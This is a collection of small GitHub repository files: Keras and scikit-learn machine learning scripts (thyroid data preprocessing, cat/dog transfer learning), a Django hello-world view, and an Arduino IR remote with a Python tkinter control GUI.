"license_type": "permissive",
"max_line_length": 96,
"num_lines": 77,
"path": "/keras_neural_net.py",
"repo_name": "AngusNicolson/numpy_neural_net",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Jan 12 19:28:30 2019\r\n\r\n@author: angus\r\n\"\"\"\r\n\r\nimport numpy as np\r\nfrom sklearn.datasets import make_moons\r\nfrom sklearn.model_selection import train_test_split\r\n\r\nfrom keras.models import Sequential\r\nfrom keras.layers import Dense\r\n\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as plt\r\nfrom matplotlib import cm\r\n#from mpl_toolkits.mplot3d import Axes3D\r\nsns.set_style(\"whitegrid\")\r\n\r\n\r\ndef make_plot(X, y, plot_name, file_name=None, XX=None, YY=None, preds=None, dark=False):\r\n if (dark):\r\n plt.style.use('dark_background')\r\n else:\r\n sns.set_style(\"whitegrid\")\r\n plt.figure(figsize=(16,12))\r\n axes = plt.gca()\r\n axes.set(xlabel=\"$X_1$\", ylabel=\"$X_2$\")\r\n plt.title(plot_name, fontsize=30)\r\n plt.subplots_adjust(left=0.20)\r\n plt.subplots_adjust(right=0.80)\r\n if(XX is not None and YY is not None and preds is not None):\r\n plt.contourf(XX, YY, preds.reshape(XX.shape), 25, alpha = 1, cmap=cm.Spectral)\r\n plt.contour(XX, YY, preds.reshape(XX.shape), levels=[.5], cmap=\"Greys\", vmin=0, vmax=.6)\r\n plt.scatter(X[:, 0], X[:, 1], c=y.ravel(), s=40, cmap=plt.cm.Spectral, edgecolors='black')\r\n if(file_name):\r\n plt.savefig(file_name)\r\n plt.close()\r\n\r\nN_SAMPLES = 1000\r\n# ratio between training and test sets\r\nTEST_SIZE = 0.1\r\n\r\nX, y = make_moons(n_samples = N_SAMPLES, noise=0.2, random_state=100)\r\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=TEST_SIZE, random_state=42)\r\n\r\n\r\nmake_plot(X, y, 'Data')\r\n\r\n\r\nmodel = Sequential()\r\n\r\nmodel.add(Dense(units=4, activation='relu', input_dim=2))\r\nmodel.add(Dense(units=6, activation='relu'))\r\n#model.add(Dense(units=6, activation='relu'))\r\n#model.add(Dense(units=4, activation='relu'))\r\nmodel.add(Dense(units=1, activation='sigmoid'))\r\n\r\nmodel.compile(optimizer='adam',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n\r\nmodel.fit(x=X_train, y=y_train, epochs=200)\r\n\r\nmodel.evaluate(x=X_test, y=y_test)\r\n\r\nplt.figure()\r\nplt.plot(model.history.history['acc'])\r\nplt.title('accuracy')\r\nplt.show()\r\n\r\nplt.figure()\r\nplt.plot(model.history.history['loss'])\r\nplt.title('loss')\r\nplt.yscale('log')\r\nplt.show()\r\n\r\n"
}
] | 3 |
jinchuuriki91/instagramproject
|
https://github.com/jinchuuriki91/instagramproject
|
a17dbdc242b01b782cb8031126647d54bc96d9e8
|
86f7206f3064142c8bc338944d66866e8898e4d4
|
853b50f3b8c66522ce8d5028d8642facb6d8ca96
|
refs/heads/master
| 2020-05-29T15:12:40.693927 | 2016-07-28T23:08:31 | 2016-07-28T23:08:31 | 64,425,584 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.4333333373069763,
"alphanum_fraction": 0.6666666865348816,
"avg_line_length": 14,
"blob_id": "02fcd2b8ad2d71c67d82eaba29693e9dc984eda5",
"content_id": "a881fffef1f4d04b38a064eef7131f22988908fe",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Text",
"length_bytes": 30,
"license_type": "no_license",
"max_line_length": 15,
"num_lines": 2,
"path": "/requirement.txt",
"repo_name": "jinchuuriki91/instagramproject",
"src_encoding": "UTF-8",
"text": "Django==1.9.8\npsycopg2==2.4.5\n"
},
{
"alpha_fraction": 0.7435897588729858,
"alphanum_fraction": 0.7435897588729858,
"avg_line_length": 22.399999618530273,
"blob_id": "9f1f107ee2dabe362d72750c75df243aff84b10b",
"content_id": "e285d51b7151ca6879eff93b981f3dce3b0a20c6",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 57,
"num_lines": 5,
"path": "/django_project/views.py",
"repo_name": "jinchuuriki91/instagramproject",
"src_encoding": "UTF-8",
"text": "from django.http import HttpResponse\n\n\ndef index(request):\n return HttpResponse(\"Hello, world. Ok now fuck off.\")\n"
}
] | 2 |
MakGulati/tata-sky-remote
|
https://github.com/MakGulati/tata-sky-remote
|
6e31920015a8aac5e5e07e221fbf6cb3c617b0fc
|
146e08d8d7d8333bfa67274bb3c9aa92e87d927c
|
184908552ff00beb578854da59c537ab53caf1af
|
refs/heads/master
| 2021-04-28T15:07:03.060952 | 2018-02-18T19:35:34 | 2018-02-18T19:35:34 | 121,982,707 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.7961956262588501,
"alphanum_fraction": 0.7989130616188049,
"avg_line_length": 32.45454406738281,
"blob_id": "5a81ab5ebaae598f80bb41281c9a3b66c61a79bc",
"content_id": "49563df785f39677f558002b0c28cef3ea07a88d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 368,
"license_type": "no_license",
"max_line_length": 97,
"num_lines": 11,
"path": "/README.md",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "# tata-sky-remote\ntata sky remote using arduino with GUI in python\n\nDecoding IR hex code using Arduino IR library with help of IRrecvDumpV2.ino\nthen writing code with help of IRsendRawDemo.ino as it was not standard remote like Sony,NEC etc.\n\nThen transmitting that values through IR transmitter.\nTo make better GUI I used tkinter module of python.\n\nCheers :)\n-Mayank\n"
},
{
"alpha_fraction": 0.25372257828712463,
"alphanum_fraction": 0.6389106512069702,
"avg_line_length": 51.06122589111328,
"blob_id": "393cf3883eb1b4ad06148f76f24753888479e87e",
"content_id": "256be6d23ce7051471df689506e91010aee5cf8a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 5104,
"license_type": "no_license",
"max_line_length": 449,
"num_lines": 98,
"path": "/IRsendRawDemo_mod.ino",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "\n\n#include <IRremote.h>\n\nIRsend irsend;\nchar data;\nvoid setup()\n{\nSerial.begin(9600);\nSerial.println(\"your response: \");\n}\n\nvoid loop() {\n int khz = 38; // 38kHz carrier frequency of 1838\n //unsigned int irSignal[] = {9000, 4500, 560, 560, 560, 560, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 1690, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 560, 560, 560, 560, 560, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 560, 560, 1690, 560, 1690, 560, 1690, 560, 1690, 560, 39416, 9000, 2210, 560}; //AnalysIR Batch Export (IRremote) - RAW\nunsigned int rawData[49] = {2600,950, 400,450, 400,500, 400,900, 400,900, 900,450, 400,450, 400,500, 400,450, 450,450, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 400,450, 400,500, 400,450, 400,500, 800,450, 450,900, 400,500, 500}; // UNKNOWN 499B750A\nunsigned int rawData1[47] = {2550,950, 400,450, 400,500, 400,900, 400,900, 850,450, 400,500, 400,500, 350,500, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 850,450, 400,900, 850}; // UNKNOWN A2B4FD50//mute\nunsigned int rawData2[47] = {2600,900, 400,500, 400,450, 450,900, 400,900, 850,450, 400,500, 400,450, 400,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 850,450, 450,900, 400,450, 850,450, 450,900, 400,450, 400}; // UNKNOWN B5509A8//guide\nunsigned int rawData3[49] = {2550,950, 400,450, 400,500, 400,900, 400,950, 800,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 400,500, 350,500, 850,900, 400,500, 350,500, 400,500, 400}; // UNKNOWN C31D712E//vol+\nunsigned int rawData4[47] = {2600,950, 400,450, 400,500, 400,900, 400,900, 850,450, 450,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,450, 450,450, 450,450, 400,450, 450,450, 400,450, 400,500, 850,900, 400,450, 400,500, 850}; // UNKNOWN 49F4E73F//vol-\nunsigned int rawData6[47] = {2550,950, 400,500, 400,450, 400,950, 350,950, 850,450, 400,500, 400,450, 400,450, 450,450, 400,500, 400,450, 400,500, 400,450, 400,450, 450,450, 400,500, 850,900, 400,450, 400,500, 400,500, 350,500, 850,450, 400}; // UNKNOWN 798DECFE //back\n//unsigned int rawData7[45] = {2550,950, 400,500, 400,450, 450,850, 400,950, 800,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 400,500, 400,450, 400,500, 450,400, 400,500, 400,450, 850,900, 850,500, 350,950, 800,950, 400}; // UNKNOWN CF7095CD //left\n//unsigned int rawData8[45] = {2550,950, 400,500, 350,500, 400,900, 400,950, 800,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 350,500, 400,500, 400,450, 850,900, 850,450, 400,950, 800,500, 400}; // UNKNOWN CE70943A //right\n//unsigned int rawData9[47] = {2550,950, 400,500, 400,450, 400,950, 400,900, 850,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 800,950, 800,500, 400,900, 400,450, 400,500, 400}; // UNKNOWN A215B7E2 //up\n//unsigned int rawData10[45] = {2550,950, 400,450, 400,500, 400,900, 400,950, 800,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,500, 350,500, 850,900, 850,450, 400,950, 350,500, 850}; // UNKNOWN A86E19D3 //down\n//unsigned int rawData11[47] = {2550,950, 400,500, 400,450, 400,950, 350,950, 850,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 400,500, 400,450, 
850,900, 850,500, 400,450, 400,900, 400,500, 400}; // UNKNOWN 9E856ADE //select\n//\n\n\nwhile (Serial.available())\n{\n data = Serial.read();\n switch(data)\n{case '5':\n { irsend.sendRaw(rawData, sizeof(rawData) / sizeof(rawData[0]), khz); //power\n delay(40);\n }\n\n\ncase '1':\n { irsend.sendRaw(rawData1, sizeof(rawData1) / sizeof(rawData1[0]), khz); //mute\n delay(40);\n break;\n }\n \ncase '2':\n { irsend.sendRaw(rawData2, sizeof(rawData2) / sizeof(rawData2[0]), khz); //guide\n delay(40);\n break;\n }\n \n\n case '3':\n { irsend.sendRaw(rawData3, sizeof(rawData3) / sizeof(rawData3[0]), khz); //vol+\n delay(40);\n break;\n }\n\n\n case '4':\n { irsend.sendRaw(rawData4, sizeof(rawData4) / sizeof(rawData4[0]), khz); //vol-\n delay(40);\n break;\n }\n\ncase '6':\n { irsend.sendRaw(rawData6, sizeof(rawData6) / sizeof(rawData6[0]), khz); //back\n delay(40);\n break;\n }\n//case '7':\n// { irsend.sendRaw(rawData7, sizeof(rawData7) / sizeof(rawData7[0]), khz); //left\n// delay(40);\n// break;\n// } \n//case '8':\n// { irsend.sendRaw(rawData8, sizeof(rawData8) / sizeof(rawData8[0]), khz); //right\n// delay(40);\n// break;\n// } \n//case '9':\n// { irsend.sendRaw(rawData9, sizeof(rawData9) / sizeof(rawData9[0]), khz); //up\n// delay(40);\n// break;\n// } \n//case 'a':\n// { irsend.sendRaw(rawData10, sizeof(rawData10) / sizeof(rawData10[0]), khz); //down\n// delay(40);\n// break;\n// } \n//case 'b':\n// { irsend.sendRaw(rawData11, sizeof(rawData11) / sizeof(rawData11[0]), khz); //select\n// delay(40);\n// break;\n// } \n \n}\n \n}\n}\n"
},
{
"alpha_fraction": 0.5752038955688477,
"alphanum_fraction": 0.6006525158882141,
"avg_line_length": 35.78313064575195,
"blob_id": "46f98569ca8b35c67760a213fefa2ad69366a6dc",
"content_id": "f16380e99bba46a4584456ae6f36b4daecf799b2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3065,
"license_type": "no_license",
"max_line_length": 90,
"num_lines": 83,
"path": "/serial_check_tk.py",
"repo_name": "MakGulati/tata-sky-remote",
"src_encoding": "UTF-8",
"text": "import serial\nimport time\nimport tkinter as tk \nArduinoSerial=serial.Serial('/dev/cu.usbmodem14311',9600)\ntime.sleep(2)\ndef close_window (): \n root.destroy()\n root.mainloop()\n import sys\n sys.exit(\"exiting\")\ndef sel():\n selection = \"You selected the option \" + str(var.get())\n label.config(text = selection)\n v = str(var.get())\n if (v == '5'): #if the value is 5\n ArduinoSerial.write('5'.encode()) #send 5\n print (\"Power\")\n time.sleep(1)\n \n if (v == '1'): #if the value is 1\n ArduinoSerial.write('1'.encode()) #send 1\n print (\"Mute\")\n time.sleep(1)\n if (v == '2'): #if the value is 2\n ArduinoSerial.write('2'.encode()) #send 2\n print (\"Guide\")\n time.sleep(1)\n if (v == '3'): #if the value is 3\n ArduinoSerial.write('3'.encode()) #send 3\n print (\"Vol+\")\n time.sleep(1)\n\n if (v == '4'): #if the value is 4\n ArduinoSerial.write('4'.encode()) #send 4\n print (\"Vol-\")\n time.sleep(1)\n \n if (v == '6'): #if the value is 6\n ArduinoSerial.write('6'.encode()) #send 6\n print (\"back\")\n time.sleep(1)\n if (v == '7'): #if the value is 7\n ArduinoSerial.write('7'.encode()) #send 7\n print (\"left\")\n time.sleep(1)\n if (v == '8'): #if the value is 8\n ArduinoSerial.write('8'.encode()) #send 8\n print (\"right\")\n time.sleep(1)\n if (v == '9'): #if the value is 9\n ArduinoSerial.write('9'.encode()) #send 9\n print (\"up\")\n time.sleep(1)\n if (v == '10'): #if the value is 10\n ArduinoSerial.write('a'.encode()) #send a\n print (\"down\")\n time.sleep(1)\n if (v == '11'): #if the value is 11\n ArduinoSerial.write('b'.encode()) #send b\n print (\"Select\")\n time.sleep(1) \n\nroot = tk.Tk()\nroot.title('Tata Sky')\nframe=tk.Frame(root)\nframe.pack()\nvar = tk.IntVar()\n\ntk.Radiobutton(root, text=\"Power\", variable=var, value=5, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Mute\", variable=var, value=1, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Guide\", variable=var, value=2, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Vol+\", variable=var, value=3, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Vol- \", variable=var, value=4, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"back\", variable=var, value=6, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"left\", variable=var, value=7, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"right\", variable=var, value=8, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"up\", variable=var, value=9, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"down\", variable=var, value=10, command=sel).pack(anchor=tk.W)\ntk.Radiobutton(root, text=\"Select\", variable=var, value=11, command=sel).pack(anchor=tk.W)\nbutton = tk.Button (frame, text = \"Good-bye.\", command = close_window).pack(anchor=tk.W)\nlabel = tk.Label(root)\nlabel.pack()\nroot.mainloop()\n\n\n\n\n\n\n \n"
}
] | 3 |
DufanD/preprocessing-tiroid
|
https://github.com/DufanD/preprocessing-tiroid
|
36ae01217c7a3a5032f4dc5a18a4b4bf94888c7f
|
2d5a95a61da48ee2b600416b87acd4dac3faef0e
|
cd35ba94618d636fe4d1a6e6ad7c4e091c4cc924
|
refs/heads/master
| 2020-06-02T19:21:12.347898 | 2019-05-02T12:42:37 | 2019-05-02T12:42:37 | null | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5779256820678711,
"alphanum_fraction": 0.5890182852745056,
"avg_line_length": 28.080644607543945,
"blob_id": "8fd85bc0cc894934bf9ba21e8755c352cf5af54c",
"content_id": "99680f38819785285027ea0c56f5e7c8538724bc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3606,
"license_type": "no_license",
"max_line_length": 80,
"num_lines": 124,
"path": "/main.py",
"repo_name": "DufanD/preprocessing-tiroid",
"src_encoding": "UTF-8",
"text": "#%%all\nimport csv\nimport numpy as np\nimport impyute as imp\nfrom scipy import stats\nimport pandas as pd\nfrom sklearn.preprocessing import MinMaxScaler\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import LeaveOneOut\n\ndef count_error(X_train, X_test, y_train, y_test):\n knn.fit(X_train, y_train)\n prediksi = knn.predict(X_test)\n if prediksi != y_test:\n return True\n\n return False\n\n#%%set_missing\ndef setMissingValues(data):\n data = pd.DataFrame({\n 'a': data[:, 0],\n 'b': data[:, 1],\n 'c': data[:, 2],\n 'd': data[:, 3],\n 'e': data[:, 4],\n 'label': data[:, 5]\n })\n\n data_missing_grouped = data.groupby('label')\n\n new_data_grouped = list()\n for key, item in data_missing_grouped:\n temp = list(imp.fast_knn(np.array(item), k=3))\n for i in temp:\n new_data_grouped.append(i)\n\n with open('data/new_tiroid.csv', 'w') as csvFile:\n writer = csv.writer(csvFile)\n writer.writerows(new_data_grouped)\n csvFile.close()\n\n return new_data_grouped\n\n#%%set_min_max\ndef setMinMaxNormalization(data):\n minmax_scaler = MinMaxScaler()\n\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n X_train = list(minmax_scaler.fit_transform(X_train))\n X_test = minmax_scaler.transform(X_test)\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Min-Max : ', (error / len(data)) * 100, '%')\n\n#%%set_zscore\ndef setZscoreNormalization(data):\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n for i in range(0, len(X_train[0])):\n X_test[0, i] = (X_test[0, i] - stats.tmean(\n X_train[:, i])) / stats.tstd(X_train[:, i])\n X_train = list(stats.zscore(X_train))\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Z-Score : ', (error / len(data)) * 100, '%')\n\n#%%set_sigmoid\ndef sigmoid(x):\n import math\n return (1 - math.exp(-x)) / (1 + math.exp(-x))\n\n#%%set_sigmoid_normalization\ndef setSigmoidNormalization(data):\n X = np.array(data)[:, :5]\n y = np.array(data)[:, 5]\n\n loo = LeaveOneOut()\n\n error = 0\n for train_index, test_index in loo.split(X):\n X_train, X_test = X[train_index], X[test_index]\n y_train, y_test = y[train_index], y[test_index]\n for i in range(0, len(X_train[0])):\n X_test[0, i] = sigmoid(\n (X_test[0, i] - stats.tmean(X_train[:, i])) /\n stats.tstd(X_train[:, i]))\n X_train = [\n [sigmoid(itemj) for itemj in item] for item in stats.zscore(X_train)\n ]\n\n if (count_error(X_train, X_test, y_train, y_test)):\n error += 1\n\n print('Error Sigmoid : ', (error / len(data)) * 100, '%')\n\nknn = KNeighborsClassifier(n_neighbors=3)\ndata_arrays = pd.read_csv('data/data_tiroid_missing.csv')\ndata_arrays = data_arrays.replace('?', np.nan)\ndata_arrays = np.array(data_arrays, dtype=float)\n\ndata_label = np.array(data_arrays)[:, 5].tolist()\n\nnew_data = setMissingValues(data_arrays)\nsetMinMaxNormalization(new_data)\nsetZscoreNormalization(new_data)\nsetSigmoidNormalization(new_data)\n"
}
] | 1 |
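
The record above compares min-max, z-score, and sigmoid normalization by counting leave-one-out 3-NN misclassifications, refitting each scaler on the training fold only. A minimal sketch of the same protocol using scikit-learn pipelines — the iris dataset is a stand-in for the thyroid CSV, and the `FunctionTransformer` sigmoid step is an assumption of mine, not part of the original script:

    :::python
    import numpy as np
    from sklearn.datasets import load_iris
    from sklearn.pipeline import make_pipeline
    from sklearn.preprocessing import MinMaxScaler, StandardScaler, FunctionTransformer
    from sklearn.neighbors import KNeighborsClassifier
    from sklearn.model_selection import LeaveOneOut, cross_val_score

    X, y = load_iris(return_X_y=True)  # placeholder data; the record reads a thyroid CSV

    # (1 - e^-z) / (1 + e^-z) applied to z-scores, mirroring the record's sigmoid() helper
    sigmoid = FunctionTransformer(lambda z: (1 - np.exp(-z)) / (1 + np.exp(-z)))

    schemes = {
        "Min-Max": make_pipeline(MinMaxScaler(), KNeighborsClassifier(n_neighbors=3)),
        "Z-Score": make_pipeline(StandardScaler(), KNeighborsClassifier(n_neighbors=3)),
        "Sigmoid": make_pipeline(StandardScaler(), sigmoid, KNeighborsClassifier(n_neighbors=3)),
    }

    for name, pipe in schemes.items():
        # A pipeline refits the scaler inside every LOO fold, so the held-out
        # sample never leaks into the normalization statistics.
        acc = cross_val_score(pipe, X, y, cv=LeaveOneOut()).mean()
        print('Error %s : %.2f %%' % (name, (1 - acc) * 100))

Wrapping scaler and classifier in one pipeline gives the same fit-on-train, transform-on-test discipline the record implements by hand, in far fewer lines.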
CYYukio/cat-dog | https://github.com/CYYukio/cat-dog | bbeeb243e703e5d6254044930cd618b2506ce2be | 7a76d01eb6873dda72208ae0d0c08a39debd4267 | 18a511530d465a80cae148c03412b7a32c632b54 | refs/heads/main | 2023-02-28T06:20:28.081439 | 2021-02-07T14:35:26 | 2021-02-07T14:35:26 | 334677512 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6226328015327454,
"alphanum_fraction": 0.6475750803947449,
"avg_line_length": 28.43661880493164,
"blob_id": "e178b9e44ac31d781a2751152ec4722b07958eeb",
"content_id": "5dc9707313b336e0cbdc00fe3f4fac794a691400",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2173,
"license_type": "no_license",
"max_line_length": 96,
"num_lines": 71,
"path": "/train.py",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "import h5py\r\nimport numpy as np\r\nfrom sklearn.utils import shuffle\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nimport pandas as pd\r\nfrom keras.preprocessing.image import *\r\nimport matplotlib.pylab as plt\r\nnp.random.seed(2017)\r\n\r\nBATCH_SIZE=128\r\nEPOCHS=40\r\n\r\n\r\nX_train = []\r\nX_test = []\r\n\r\nfor filename in [\"pre_ResNet50.h5\", \"pre_VGG19.h5\", \"pre_InceptionV3.h5\"]:\r\n with h5py.File(filename, 'r') as h:\r\n X_train.append(np.array(h['train']))\r\n X_test.append(np.array(h['test']))\r\n y_train = np.array(h['label'])\r\n\r\nX_train = np.concatenate(X_train, axis=1)\r\nX_test = np.concatenate(X_test, axis=1)\r\n\r\nX_train, y_train = shuffle(X_train, y_train)\r\n\r\n\r\ninput_tensor = Input(X_train.shape[1:])\r\nx = Dropout(0.5)(input_tensor)\r\nx = Dense(1, activation='sigmoid')(x)\r\nmodel = Model(input_tensor, x)\r\n\r\nmodel.compile(optimizer='adadelta',\r\n loss='binary_crossentropy',\r\n metrics=['accuracy'])\r\n\r\n_history=model.fit(X_train, y_train, batch_size=BATCH_SIZE, epochs=EPOCHS, validation_split=0.2)\r\nmodel.save(\"./model.h5\")#保存模型\r\n\r\ny_pred = model.predict(X_test, verbose=1)\r\ny_pred = y_pred.clip(min=0.005, max=0.995)\r\n\r\ndf = pd.read_csv(\"sample_submission.csv\",header=None, delim_whitespace=True, engine='python')\r\n\r\ngen = ImageDataGenerator()\r\ntest_generator = gen.flow_from_directory(\"test2\", (224, 224), shuffle=False,\r\n batch_size=16, class_mode=None)\r\n\r\nfor i, fname in enumerate(test_generator.filenames):\r\n index = int(fname[fname.rfind('/')+1:fname.rfind('.')])\r\n df.set_value(index-1, 'label', y_pred[i])\r\n\r\ndf.to_csv('pred.csv', index=None)\r\ndf.head(10)\r\n\r\n\r\nplt.style.use(\"ggplot\")\r\nplt.figure()\r\nN= EPOCHS\r\nplt.plot(np.arange(0, N), _history.history[\"loss\"], label=\"train_loss\")\r\nplt.plot(np.arange(0, N), _history.history[\"val_loss\"], label=\"val_loss\")\r\nplt.plot(np.arange(0, N), _history.history[\"accuracy\"], label=\"train_acc\")\r\nplt.plot(np.arange(0, N), _history.history[\"val_accuracy\"], label=\"val_acc\")\r\nplt.title(\"loss and accuracy\")\r\nplt.xlabel(\"epoch\")\r\nplt.ylabel(\"loss/acc\")\r\nplt.legend(loc=\"best\")\r\nplt.savefig(\"./result.png\")\r\nplt.show()\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6705882549285889,
"alphanum_fraction": 0.6985294222831726,
"avg_line_length": 35.77777862548828,
"blob_id": "cb153ada29df5827a9a75d322825e926dbb70b54",
"content_id": "6f58e419daace5b82bae886d6ef2afbb686950be",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1384,
"license_type": "no_license",
"max_line_length": 112,
"num_lines": 36,
"path": "/savemodel.py",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "##准备用预训练过的大型网络\r\nfrom keras.models import *\r\nfrom keras.layers import *\r\nfrom keras.applications import *\r\nfrom keras.preprocessing.image import *\r\nfrom keras.applications.inception_v3 import InceptionV3, preprocess_input\r\nimport h5py\r\n\r\ndef save_model(MODEL,image_size,lambda_func=None):\r\n width = image_size[0]\r\n height = image_size[1]\r\n input_tensor = Input((width, height, 3))\r\n x = input_tensor\r\n\r\n if lambda_func:\r\n x=Lambda(lambda_func)(x)\r\n\r\n base_model=MODEL(input_tensor=x,weights='imagenet',include_top=False)\r\n model=Model(base_model.input, GlobalAveragePooling2D()(base_model.output))\r\n\r\n gen=ImageDataGenerator()\r\n train_generator = gen.flow_from_directory(\"train2\", image_size, shuffle=False, batch_size=16)\r\n test_generator = gen.flow_from_directory(\"test2\", image_size, shuffle=False, batch_size=16, class_mode=None)\r\n\r\n train=model.predict(train_generator,train_generator.samples)\r\n test=model.predict(test_generator,test_generator.samples)\r\n\r\n with h5py.File(\"pre_%s.h5\" % MODEL.__name__) as h:\r\n h.create_dataset(\"train\", data=train)\r\n h.create_dataset(\"test\", data=test)\r\n h.create_dataset(\"label\", data=train_generator.classes)\r\n\r\n\r\n#save_model(ResNet50, (224, 224))\r\nsave_model(InceptionV3, (299, 299), preprocess_input)\r\nsave_model(VGG19, (299, 299), preprocess_input)\r\n"
},
{
"alpha_fraction": 0.6821191906929016,
"alphanum_fraction": 0.807947039604187,
"avg_line_length": 12.727272987365723,
"blob_id": "dbe97ac6ca01012c9acd5c8477d9cb68408a3978",
"content_id": "7f327b1ff2fbf23628d7e5a31217e800dbb408e2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 263,
"license_type": "no_license",
"max_line_length": 51,
"num_lines": 11,
"path": "/README.md",
"repo_name": "CYYukio/cat-dog",
"src_encoding": "UTF-8",
"text": "# cat-dog\n猫狗分类\n\n2021-02-04\n完成模型预测,csv提交到kaggle\n\n链接:https://pan.baidu.com/s/1sk0nCV872HhA2Z4O11jjAQ \n提取码:y96f \n复制这段内容后打开百度网盘手机App,操作更方便哦\n\n数据以及网络模型上传至网盘\n"
}
] | 3 |
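
The three files above implement a classic transfer-learning baseline: bottleneck features from ResNet50, VGG19, and InceptionV3 are precomputed to HDF5, concatenated, and a single dropout-plus-sigmoid unit is trained on top. A minimal sketch of that classifier head — the random arrays and their sizes are illustrative assumptions standing in for the real pre_*.h5 features:

    :::python
    import numpy as np
    from keras.models import Model
    from keras.layers import Input, Dropout, Dense

    # Placeholder bottleneck features (the real ones come from the pre_*.h5 files).
    rng = np.random.default_rng(2017)
    feats = [rng.random((1000, d), dtype=np.float32) for d in (2048, 512, 2048)]
    labels = rng.integers(0, 2, size=1000)

    # Fuse the three networks' features along the feature axis, as in train.py.
    X = np.concatenate(feats, axis=1)

    inp = Input(shape=(X.shape[1],))
    out = Dense(1, activation='sigmoid')(Dropout(0.5)(inp))
    model = Model(inp, out)
    model.compile(optimizer='adadelta', loss='binary_crossentropy', metrics=['accuracy'])
    model.fit(X, labels, batch_size=128, epochs=2, validation_split=0.2)

Because the heavy convolutional bases are frozen and run only once during feature extraction, this one-unit head typically trains in seconds even on a CPU.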